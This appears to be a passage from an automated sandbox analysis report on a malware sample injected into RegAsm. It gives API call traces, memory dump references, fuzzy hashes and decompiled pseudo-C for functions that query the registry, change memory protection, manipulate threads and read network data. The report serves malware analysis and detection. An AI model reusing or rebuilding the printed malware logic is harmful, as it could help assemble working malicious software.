StrChrW.SHLWAPI(010A2167,00000020,61636F4C,00000001,00000000,?,?,00000000,?,010A2167,?,?,?), ref: 010A26FB
WaitForSingleObject.KERNEL32(00000000,00004E20,010A2167,00000000,?,00000000,?,010A2167,?,?,?,?,?,?,?,010A675D), ref: 010A2729
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,010A2167,?,?,?), ref: 010A2757
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,010A2167,?,?,?), ref: 010A276F

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 4fc926a5e6d8221ffbb5c8dcd3f4dbc0468dafb2e4b3d3d7caa37e1ad565eba3
Instruction ID: ce395fd7a97747f38c0247394417b116e3e9a3105ea4aeb115c038f1d3bbd567
Opcode Fuzzy Hash: 4fc926a5e6d8221ffbb5c8dcd3f4dbc0468dafb2e4b3d3d7caa37e1ad565eba3
Instruction Fuzzy Hash: B121E132601712ABE7725BEC9C88B9E7BE8BB4C750F850274FEC19B284EB65C9008740

Uniqueness

Uniqueness Score: -1.00%

Function 03F0B84E, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F08E53: RegCreateKeyA.ADVAPI32(80000001,043AA7F0,?), ref: 03F08E68
Part of subcall function 03F08E53: lstrlen.KERNEL32(043AA7F0,00000000,00000000,00000000,?,03F0B86A,00000000,00000000,00000001,74E04D40,03F1BD19,03F1BD19,?,03F1ED32,?,03F1BD19), ref: 03F08E91

RegQueryValueExA.KERNELBASE(00000000,03F1BD19,00000000,03F1BD19,00000000,?,00000000,00000000,00000000,00000001,74E04D40,03F1BD19,03F1BD19,?,03F1ED32,?), ref: 03F0B886
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F0B89A
RegQueryValueExA.ADVAPI32(00000000,03F1BD19,00000000,03F1BD19,00000000,?,?,03F1ED32,?,03F1BD19,00000000,00000001,00000000,74E04D40), ref: 03F0B8B4
HeapFree.KERNEL32(00000000,?,?,03F1ED32,?,03F1BD19,00000000,00000001,00000000,74E04D40,?,?,?,03F1BD19,00000000), ref: 03F0B8D0
RegCloseKey.ADVAPI32(00000000,?,03F1ED32,?,03F1BD19,00000000,00000001,00000000,74E04D40,?,?,?,03F1BD19,00000000), ref: 03F0B8DE

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
String ID:
API String ID: 1633053242-0
Opcode ID: 35c5331e7815b09b825bc40b513dfcf01944c45ff2f30ed788e8333fe003a4c4
Instruction ID: b72bb89aaf431693c3f953347f4003c0008baf2a2c712cd38e25146b37f3dd79
Opcode Fuzzy Hash: 35c5331e7815b09b825bc40b513dfcf01944c45ff2f30ed788e8333fe003a4c4
Instruction Fuzzy Hash: 41115BB250010DFFCF11EF98CCC4CAE7BBEEB58254B150426F90193260E771AD55AB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F1BC2F, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(03F11BE7,?,00000040,?,03F2B7A4,?,00000000,03F2B7A4,03F2B7A0,-0000000C,00000000,?,?,03F11BE7,0000000C,00000000), ref: 03F1BC54
GetLastError.KERNEL32(?,00000000,03F2B7A4,03F2B7A0,-0000000C,00000000,?,?,03F11BE7,0000000C,00000000,?), ref: 03F1BC5C
VirtualQuery.KERNEL32(03F11BE7,03F2B7A4,0000001C,?,00000000,03F2B7A4,03F2B7A0,-0000000C,00000000,?,?,03F11BE7,0000000C,00000000,?), ref: 03F1BC73
VirtualProtect.KERNEL32(03F11BE7,?,-2C9B417C,?,?,00000000,03F2B7A4,03F2B7A0,-0000000C,00000000,?,?,03F11BE7,0000000C,00000000,?), ref: 03F1BC98
SetLastError.KERNEL32(0000000C,?,00000000,03F2B7A4,03F2B7A0,-0000000C,00000000,?,?,03F11BE7,0000000C,00000000,?), ref: 03F1BCA1

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Virtual$ErrorLastProtect$Query
String ID:
API String ID: 148356745-0
Opcode ID: e776fb5e19160c3d198683be469171d9c58409758e7c316c1dd2e97f2a7520e9
Instruction ID: 6775f467f4c7fa6ba16141be05e925caf5e74fdc7ea847bb90961bf76c147272
Opcode Fuzzy Hash: e776fb5e19160c3d198683be469171d9c58409758e7c316c1dd2e97f2a7520e9
Instruction Fuzzy Hash: 1701E97250020EEFEB11AF95DC5489ABBBDFF18255B044026F941D3124DBB1EA649B60

Uniqueness

Uniqueness Score: -1.00%

Function 004018F5, Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x404160 = _t1;
				if(_t1 != 0) {
					 *0x404170 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E0040140F(); // executed
					_t6 = _t4; // executed
					HeapDestroy( *0x404160); // executed
				}
				ExitProcess(_t6);
			}

0x004018f6
0x004018ff
0x00401907
0x0040190c
0x00401915
0x0040191a
0x00401920
0x0040192b
0x0040192d
0x0040192d
0x00401934

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 004018FF
GetModuleHandleA.KERNEL32(00000000), ref: 0040190F
GetCommandLineW.KERNEL32 ref: 0040191A

Part of subcall function 0040140F: NtQuerySystemInformation.NTDLL ref: 0040144A
Part of subcall function 0040140F: Sleep.KERNELBASE(00000000,00000000), ref: 00401495
Part of subcall function 0040140F: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 004014DA
Part of subcall function 0040140F: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 004014F8
Part of subcall function 0040140F: CreateThread.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00401522

HeapDestroy.KERNELBASE ref: 0040192D
ExitProcess.KERNEL32 ref: 00401934

Memory Dump Source

Source File: 00000008.00000002.521792829.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.521817363.0000000000405000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.521835908.0000000000407000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: CreateHeapLongNamePath$CommandDestroyExitHandleInformationLineModuleProcessQuerySleepSystemThread
String ID:
API String ID: 1488949272-0
Opcode ID: 10b25834b5bc6bab7d34793f3fcf75dcb627427aba8ceed308b480a14083ec9e
Instruction ID: 3337b279a143dae8ed211152dfdf709dc27b46c8f9220e14fc12e48f615516d5
Opcode Fuzzy Hash: 10b25834b5bc6bab7d34793f3fcf75dcb627427aba8ceed308b480a14083ec9e
Instruction Fuzzy Hash: 4DE0B6B5802220ABC7216F71BE0CA4A3E68BF597567104135F605F6175CB388B41CBAC

Uniqueness

Uniqueness Score: -1.00%

Function 010A489D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A489D(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E010A1314(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x10aa2d4; // 0x235d5a8
				_t4 = _t24 + 0x10abde0; // 0x3409388
				_t5 = _t24 + 0x10abd88; // 0x4f0053
				_t26 = E010A3238( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x10aa2d4; // 0x235d5a8
						_t11 = _t32 + 0x10abdd4; // 0x340937c
						_t48 = _t11;
						_t12 = _t32 + 0x10abd88; // 0x4f0053
						_t52 = E010A6044(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x10aa2d4; // 0x235d5a8
							_t13 = _t35 + 0x10abe1e; // 0x30314549
							if(E010A49B0(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x10aa2b4 - 6;
								if( *0x10aa2b4 <= 6) {
									_t42 =  *0x10aa2d4; // 0x235d5a8
									_t15 = _t42 + 0x10abd6a; // 0x52384549
									E010A49B0(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x10aa2d4; // 0x235d5a8
							_t17 = _t38 + 0x10abe18; // 0x34093c0
							_t18 = _t38 + 0x10abdf0; // 0x680043
							_t45 = E010A3A49(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x10aa290, 0, _t52);
						}
					}
					HeapFree( *0x10aa290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E010A3175(_t54);
				}
				return _t45;
			}

0x010a489d
0x010a48ad
0x010a48b0
0x010a48b7
0x010a48b9
0x010a48b9
0x010a48bc
0x010a48c1
0x010a48c8
0x010a48d5
0x010a48da
0x010a48de
0x010a48ec
0x010a48fa
0x010a48fe
0x010a498f
0x010a498f
0x010a4904
0x010a4904
0x010a4909
0x010a4909
0x010a4910
0x010a491c
0x010a491e
0x010a4920
0x010a4922
0x010a4929
0x010a493b
0x010a493d
0x010a4944
0x010a4946
0x010a494d
0x010a4958
0x010a4958
0x010a4944
0x010a495d
0x010a4962
0x010a4969
0x010a4987
0x010a4989
0x010a4989
0x010a4920
0x010a499b
0x010a499b
0x010a499d
0x010a49a2
0x010a49a4
0x010a49a4
0x010a49af

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03409388,00000000,?,74E5F710,00000000,74E5F730), ref: 010A48EC
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,034093C0,?,00000000,30314549,00000014,004F0053,0340937C), ref: 010A4989
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,010A66F2), ref: 010A499B

Strings

Ut, xrefs: 010A48F2

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID: Ut
API String ID: 3298025750-8415677
Opcode ID: 9d5bd75a2ceca9d3641a538db4a4297c5d0276ea196104c15ec8500290caf6bb
Instruction ID: d43fbf826af1924700db8f14fc5fc06e9fb36280f66c8e16a160a3a908f82be8
Opcode Fuzzy Hash: 9d5bd75a2ceca9d3641a538db4a4297c5d0276ea196104c15ec8500290caf6bb
Instruction Fuzzy Hash: 54319036A00119FFDB21DBD8DC84EDE7BF8EB04704F980065A6C4EB051D7B65A18DB90

Uniqueness

Uniqueness Score: -1.00%

Function 010A3B2B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E010A3B2B(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t46 = __edx;
				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0x10aa2d4; // 0x235d5a8
				_t2 = _t22 + 0x10ab671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0x10aa2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x10aa2a4 =  *0x10aa2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E010A2836(_t49, _t48); // executed
					_t33 = E010A218F(_t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0x10aa2a4 < 5) {
							 *0x10aa2a4 =  *0x10aa2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E010A315F();
					HeapFree( *0x10aa290, 0, _t48);
					goto L9;
				}
				_t50 =  *0x10aa390; // 0x3408d6c
				if(RtlAllocateHeap( *0x10aa290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E010A1D10(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36);
				goto L5;
			}

0x010a3b2b
0x010a3b2b
0x010a3b32
0x010a3b39
0x010a3b3d
0x010a3b42
0x010a3b4d
0x010a3b5d
0x010a3ba0
0x010a3ba4
0x010a3ba8
0x010a3ba9
0x010a3bac
0x010a3bb1
0x010a3bb1
0x010a3bb4
0x010a3bb8
0x010a3bf2
0x010a3bf2
0x010a3bf8
0x010a3bff
0x010a3bff
0x010a3bba
0x010a3bbd
0x010a3bbf
0x010a3bcc
0x010a3bce
0x010a3bd5
0x010a3c0c
0x010a3c11
0x010a3c13
0x010a3c15
0x010a3c15
0x00000000
0x010a3c13
0x010a3bd7
0x010a3bde
0x010a3bec
0x00000000
0x010a3bec
0x010a3b5f
0x010a3b7a
0x010a3b94
0x00000000
0x010a3b94
0x010a3b8d
0x00000000

APIs

wsprintfA.USER32 ref: 010A3B4D
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 010A3B72

Part of subcall function 010A1D10: GetTickCount.KERNEL32 ref: 010A1D27
Part of subcall function 010A1D10: wsprintfA.USER32 ref: 010A1D74
Part of subcall function 010A1D10: wsprintfA.USER32 ref: 010A1D91
Part of subcall function 010A1D10: wsprintfA.USER32 ref: 010A1DB1
Part of subcall function 010A1D10: wsprintfA.USER32 ref: 010A1DCF
Part of subcall function 010A1D10: wsprintfA.USER32 ref: 010A1DF2
Part of subcall function 010A1D10: wsprintfA.USER32 ref: 010A1E13

HeapFree.KERNEL32(00000000,010A673C,?,?,010A673C,?), ref: 010A3BEC

Strings

Ut, xrefs: 010A3BEC

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID: Ut
API String ID: 2794511967-8415677
Opcode ID: 7f5ab79969e5bc928fefdeddd7fa5a41376834a9613cfa801a0610e43e03632a
Instruction ID: 18a4b3e8ccb4973c5f6f5de6b5bfac2271c5adb916def57aefdf93cbc2a7dabf
Opcode Fuzzy Hash: 7f5ab79969e5bc928fefdeddd7fa5a41376834a9613cfa801a0610e43e03632a
Instruction Fuzzy Hash: C9314C75600119EFCB11DFA8D884EDA7BBDFB08344F904062FA85DB240D739E954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 010A1B37, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E010A1B37(void* __ecx, signed int __edx, intOrPtr _a4) {
				char _v8;
				long _v12;
				long _v16;
				void* _t7;
				void* _t9;
				intOrPtr _t11;
				signed int _t14;

				_t14 = __edx;
				_t7 = HeapCreate(0, 0x400000, 0); // executed
				 *0x10aa290 = _t7;
				if(_t7 != 0) {
					 *0x10aa180 = GetTickCount();
					_t9 = E010A25BA(_a4);
					if(_t9 == 0) {
						E010A11AB(_a4);
						_t11 =  *0x10aa2ac; // 0x298
						_v12 = 0;
						if(_t11 != 0) {
							__imp__(_t11,  &_v8);
							if(_t11 == 0) {
								_v16 = 0;
							}
							if(_v16 != 0) {
								 *0x10aa2b8 = 1; // executed
							}
						}
						_t9 = E010A57B9(_t14); // executed
					}
				} else {
					_t9 = 8;
				}
				return _t9;
			}

0x010a1b37
0x010a1b48
0x010a1b50
0x010a1b55
0x010a1b65
0x010a1b6a
0x010a1b71
0x010a1b76
0x010a1b7b
0x010a1b82
0x010a1b86
0x010a1b8e
0x010a1b96
0x010a1b98
0x010a1b98
0x010a1ba0
0x010a1ba2
0x010a1ba2
0x010a1ba0
0x010a1bac
0x010a1bac
0x010a1b57
0x010a1b59
0x010a1b59
0x010a1bb5

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,00000001,?,?,010A3E60,?), ref: 010A1B48
GetTickCount.KERNEL32 ref: 010A1B5C
IsWow64Process.KERNEL32(00000298,?,?,?,?,?,010A3E60,?), ref: 010A1B8E

Strings

Tt, xrefs: 010A1B48

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: CountCreateHeapProcessTickWow64
String ID: Tt
API String ID: 495740328-3291821022
Opcode ID: bde159b56b970b0c809875c584e2a00718fcd4ae9f578deb4e7118b92816eb0e
Instruction ID: b7b6d9310266719cefbfc08ee69c17c1b1d1fd7978cfcd1056585032bf8d373d
Opcode Fuzzy Hash: bde159b56b970b0c809875c584e2a00718fcd4ae9f578deb4e7118b92816eb0e
Instruction Fuzzy Hash: 4201AD70629624EFCB315FA8AC49A9A7BA8AB00B90FD0865AF5C5C2180E7769440D7E5

Uniqueness

Uniqueness Score: -1.00%

Function 03F22880, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03F228AE
ResumeThread.KERNELBASE(03F017CA,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 03F22938
WaitForSingleObject.KERNEL32(00000064), ref: 03F22946
SuspendThread.KERNELBASE(03F017CA), ref: 03F22959

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Thread$ObjectResumeSingleSuspendWaitmemset
String ID:
API String ID: 3168247402-0
Opcode ID: a7a0496318f8552b818645082ed807dcd845e145b66994f215090504c017f5ce
Instruction ID: fff6e29458a379c7ab01f31de1379c04c0f0c033f5a28eb071e48a1c5f827ef3
Opcode Fuzzy Hash: a7a0496318f8552b818645082ed807dcd845e145b66994f215090504c017f5ce
Instruction Fuzzy Hash: C9416C71504302EFE721EF55DC80A6BBBE9FF88350F044D2EFA9486160D771D9649B62

Uniqueness

Uniqueness Score: -1.00%

Function 010A4E03, Relevance: 6.1, APIs: 4, Instructions: 108
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E010A4E03(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				void* _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				long _t52;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_t44 =  *0x10aa144(0, 1,  &_v24); // executed
				if(_t44 != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E010A4573(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0x10aa2c4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E010A2625(_v20);
							if(_v8 == 0) {
								_t52 = E010A77DC(_v24, _t64); // executed
								_v8 = _t52;
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53); // executed
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}

0x010a4e0b
0x010a4e0e
0x010a4e17
0x010a4e1a
0x010a4e1d
0x010a4e25
0x010a4f23
0x010a4f2e
0x010a4f31
0x010a4f39
0x010a4f40
0x010a4f40
0x010a4f33
0x010a4f36
0x010a4f36
0x00000000
0x010a4f36
0x010a4e2e
0x00000000
0x00000000
0x010a4e3b
0x010a4e43
0x010a4f1a
0x00000000
0x010a4f1a
0x010a4e4f
0x010a4e56
0x010a4e59
0x010a4f08
0x010a4f0f
0x010a4f0f
0x010a4f15
0x00000000
0x00000000
0x00000000
0x00000000
0x010a4e5f
0x010a4e5f
0x010a4e5f
0x010a4e5f
0x010a4e64
0x010a4e66
0x010a4e66
0x010a4e73
0x010a4e7b
0x00000000
0x00000000
0x010a4e7d
0x010a4e8a
0x010a4e90
0x010a4e90
0x010a4e93
0x00000000
0x00000000
0x010a4ea0
0x010a4eb4
0x010a4eea
0x010a4eed
0x010a4ef0
0x010a4ef8
0x010a4efe
0x010a4f03
0x010a4f03
0x00000000
0x010a4ef8
0x010a4eb6
0x010a4ebd
0x010a4ec5
0x00000000
0x00000000
0x010a4ec7
0x010a4ed2
0x010a4ed5
0x00000000
0x010a4edc
0x010a4edc
0x00000000
0x010a4edc
0x010a4ed5
0x010a4e9d
0x00000000
0x010a4edf
0x010a4edf
0x00000000

APIs

GetLastError.KERNEL32 ref: 010A4F23

Part of subcall function 010A4573: RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

GetLastError.KERNEL32 ref: 010A4E97
WaitForSingleObject.KERNEL32(00000000), ref: 010A4EA7
GetLastError.KERNEL32 ref: 010A4EC7

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: 079d203c9ca1bf1565b0f67e1829b4e193ffac1b7be8c2dc5144573a7869ef07
Instruction ID: 3036025fb845ec0e670da416ee0c5edcb90f6da70c22080e82242a29504316a0
Opcode Fuzzy Hash: 079d203c9ca1bf1565b0f67e1829b4e193ffac1b7be8c2dc5144573a7869ef07
Instruction Fuzzy Hash: D5414178E00209EFDF20DFE8C9889ADBBB9FF04345F9444A9E582E7141D7B59A40DB10

Uniqueness

Uniqueness Score: -1.00%

Function 010A5F2C, Relevance: 6.1, APIs: 4, Instructions: 98
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A5F2C(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E010A4573(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E010A2625(_v28);
							goto L17;
						}
						_t42 = E010A1821(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E010A2625(_v24);
						_v20 = _v16;
						_t47 = E010A4573(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x10aa2c4, 0) == 0x102);
				goto L16;
			}

0x010a5f2c
0x010a5f46
0x010a5f49
0x010a5f4c
0x010a5f4f
0x010a5f52
0x010a5f58
0x010a5f5c
0x010a6036
0x010a603a
0x010a603a
0x010a5f65
0x010a5f6c
0x010a5f73
0x010a5f76
0x010a602b
0x010a602e
0x00000000
0x010a6034
0x010a5f7c
0x010a5f7f
0x010a5f86
0x010a5f90
0x010a5f99
0x010a5f9f
0x010a5fa7
0x010a5fdf
0x010a6019
0x010a601f
0x010a6021
0x010a6021
0x010a6023
0x010a6026
0x00000000
0x010a6026
0x010a5ff4
0x010a5ff9
0x010a5ffd
0x00000000
0x00000000
0x00000000
0x010a5ffd
0x010a5fac
0x010a5fbb
0x00000000
0x00000000
0x010a5fc0
0x010a5fc9
0x010a5fcc
0x010a5fd3
0x010a5fd6
0x010a5fb1
0x010a5fb1
0x00000000
0x010a5fb1
0x010a5fda
0x00000000
0x010a5fda
0x010a5fae
0x00000000
0x010a5fff
0x010a600c
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,010A2148,?), ref: 010A5F52

Part of subcall function 010A4573: RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

RegEnumKeyExA.KERNELBASE(?,?,?,010A2148,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,010A2148), ref: 010A5F99
WaitForSingleObject.KERNEL32(00000000,?,?,?,010A2148,?,010A2148,?,?,?,?,?,010A2148,?), ref: 010A6006
RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,010A2148,?,?,?,?,?,010A675D,?), ref: 010A602E

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

